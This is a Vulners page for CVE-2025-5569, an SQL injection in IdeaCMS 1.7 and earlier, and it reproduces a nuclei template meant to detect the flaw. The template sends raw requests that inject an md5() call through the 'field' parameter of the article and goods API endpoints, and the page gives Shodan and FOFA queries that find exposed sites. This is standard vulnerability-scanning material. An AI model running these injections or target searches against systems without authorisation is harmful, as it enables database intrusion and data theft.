Lucene search
K

IdeaCMS <= 1.7 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 46 Views

IdeaCMS up to 1.7 is critical for SQL injection via article and product query field parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-5569
4 Jun 202507:24
circl
CNNVD
IdeaCMS 注入漏洞
4 Jun 202500:00
cnnvd
CVE
CVE-2025-5569
4 Jun 202505:31
cve
Cvelist
CVE-2025-5569 IdeaCMS getList.html Goods sql injection
4 Jun 202505:31
cvelist
EUVD
EUVD-2025-16845
3 Oct 202520:07
euvd
NVD
CVE-2025-5569
4 Jun 202506:15
nvd
OSV
CVE-2025-5569
4 Jun 202506:15
osv
Positive Technologies
PT-2025-23769 · Ideacms · Ideacms
4 Jun 202500:00
ptsecurity
RedhatCVE
CVE-2025-5569
6 Jun 202506:21
redhatcve
Vulnrichment
CVE-2025-5569 IdeaCMS getList.html Goods sql injection
4 Jun 202505:31
vulnrichment
Rows per page
id: CVE-2025-5569

info:
  name: IdeaCMS <= 1.7 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    IdeaCMS up to 1.7 is vulnerable to SQL injection via the field parameter in article and product query interfaces. This template uses a time-based payload to safely detect the vulnerability.
  impact: |
    Unauthenticated attackers can extract sensitive data from the database through SQL injection in the field parameter, potentially compromising user information and system credentials.
  remediation: |
    Upgrade IdeaCMS to a version later than 1.7 that properly sanitizes SQL parameters in article and product query interfaces.
  reference:
    - https://gitee.com/ideacms/ideacms/issues/ICBVWE#note_42016626_link
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5569
  classification:
    epss-score: 0.01269
    epss-percentile: 0.66204
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-5569
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    product: IdeaCMS
    shodan-query: http.favicon.hash:-1033616879
    fofa-query: icon_hash:"-1033616879"
  tags: cve,cve2025,ideacms,sqli,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /api/v1.index.article/getList.html?field=id,md5({{num}})&size=1&cat=3&time_stamp=1781864476 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1.index.goods/getList.html?field=id,md5({{num}})&activity_type=hot&time_stamp=1781864476 HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
          - 'id":1'
          - 'data":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022006764c25bff55cafbc680908781e21bf22d91b236ac7bfdfddd55fa3315a3add022100a54fdd35fe283dbeb64ccce6a835f2c606e81495bafeb121d06654617b467a1e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.3 - 8.8
CVSS 45.3
CVSS 26.5
CVSS 36.3
EPSS0.01269
SSVC
46